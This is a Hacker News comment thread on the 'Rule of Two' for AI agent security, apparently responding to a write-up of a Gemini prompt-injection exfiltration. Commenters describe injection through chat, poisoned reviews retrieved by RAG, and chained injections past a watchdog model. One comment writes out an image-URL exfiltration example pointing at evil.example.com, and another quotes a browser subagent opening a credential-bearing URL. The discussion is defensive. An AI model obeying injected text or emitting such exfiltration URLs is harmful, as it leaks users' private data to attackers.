Remix.run Logo
wingmanjd 6 hours ago

I really liked Simon's Willison's [1] and Meta's [2] approach using the "Rule of Two". You can have no more than 2 of the following:

- A) Process untrustworthy input - B) Have access to private data - C) Be able to change external state or communicate externally.

It's not bullet-proof, but it has helped communicate to my management that these tools have inherent risk when they hit all three categories above (and any combo of them, imho).

[EDIT] added "or communicate externally" to option C.

[1] https://simonwillison.net/2025/Nov/2/new-prompt-injection-pa... [2] https://ai.meta.com/blog/practical-ai-agent-security/

btown 4 hours ago | parent | next [-]

It's really vital to also point out that (C) doesn't just mean agentically communicate externally - it extends to any situation where any of your users can even access the output of a chat or other generated text.

You might say "well, I'm running the output through a watchdog LLM before displaying to the user, and that watchdog doesn't have private data access and checks for anything nefarious."

But the problem is that the moment someone figures out how to prompt-inject a quine-like thing into a private-data-accessing system, such that it outputs another prompt injection, now you've got both (A) and (B) in your system as a whole.

Depending on your problem domain, you can mitigate this: if you're doing a classification problem and validate your outputs that way, there's not much opportunity for exfiltration (though perhaps some might see that as a challenge). But plaintext outputs are difficult to guard against.

quuxplusone 3 hours ago | parent [-]

Can you elaborate? How does an attacker turn "any of your users can even access the output of a chat or other generated text" into a means of exfiltrating data to the attacker?

Are you just worried about social engineering — that is, if the attacker can make the LLM say "to complete registration, please paste the following hex code into evil.example.com:", then a large number of human users will just do that? I mean, you'd probably be right, but if that's "all" you mean, it'd be helpful to say so explicitly.

quuxplusone 2 hours ago | parent | next [-]

Ah, perhaps answering myself: if the attacker can get the LLM to say "here, look at this HTML content in your browser: ... img src="https://evil.example.com/exfiltrate.jpg?data= ...", then a large number of human users will do that for sure.

btown 3 hours ago | parent | prev [-]

So if an agent has no access to non-public data, that's (A) and (C) - the worst an attacker can do, as you note, is socially engineer themselves.

But say you're building an agent that does have access to non-public data - say, a bot that can take your team's secret internal CRM notes about a client, or Top Secret Info about the Top Secret Suppliers relevant to their inquiry, or a proprietary basis for fraud detection, into account when crafting automatic responses. Or, if you even consider the details of your system prompt to be sensitive. Now, you have (A) (B) and (C).

You might think that you can expressly forbid exfiltration of this sensitive information in your system prompt. But no current LLM is fully immune to prompt injection that overrides its system prompt from a determined attacker.

And the attack doesn't even need to come from the user's current chat messages. If they're able to poison your database - say, by leaving a review or comment somewhere with the prompt injection, then saying something that's likely to bring that into the current context via RAG, that's also a way of injecting.

This isn't to say that companies should avoid anything that has (A) (B) and (C) - tremendous value lies at this intersection! The devil's in the details: the degree of sensitivity of the information, the likelihood of highly tailored attacks, the economic and brand-integrity consequences of exfiltration, the tradeoffs against speed to market. But every team should have this conversation and have open eyes before deploying.

quuxplusone 2 hours ago | parent [-]

Your elaboration seems to assume that you already have (C). I was asking, how do you get to (C) — what made you say "(C) extends to any situation where any of your users can even access the output of a chat or other generated text"?

ArcHound 6 hours ago | parent | prev [-]

I recall that. In this case, you have only A and B and yet, all of your secrets are in the hands of an attacker.

It's great start, but not nearly enough.

EDIT: right, when we bundle state with external Comms, we have all three indeed. I missed that too.

malisper 5 hours ago | parent | next [-]

Not exactly. Step E in the blog post:

> Gemini exfiltrates the data via the browser subagent: Gemini invokes a browser subagent per the prompt injection, instructing the subagent to open the dangerous URL that contains the user's credentials.

fulfills the requirements for being able to change external state

ArcHound 5 hours ago | parent [-]

I disagree. No state "owned" by LLM changed, it only sent a request to the internet like any other.

EDIT: In other words, the LLM didn't change any state it has access to.

To stretch this further - clicking on search results changes the internal state of Google. Would you consider this ability of LLM to be state-changing? Where would you draw the line?

wingmanjd 5 hours ago | parent | next [-]

[EDIT]

I should have included the full C option:

Change state or communicate externally. The ability to call `cat` and then read results would "activate" the C option in my opinion.

5 hours ago | parent | prev [-]
[deleted]
bartek_gdn 5 hours ago | parent | prev [-]

What do you mean? The last part in this case is also present, you can change external state by sending a request with the captured content.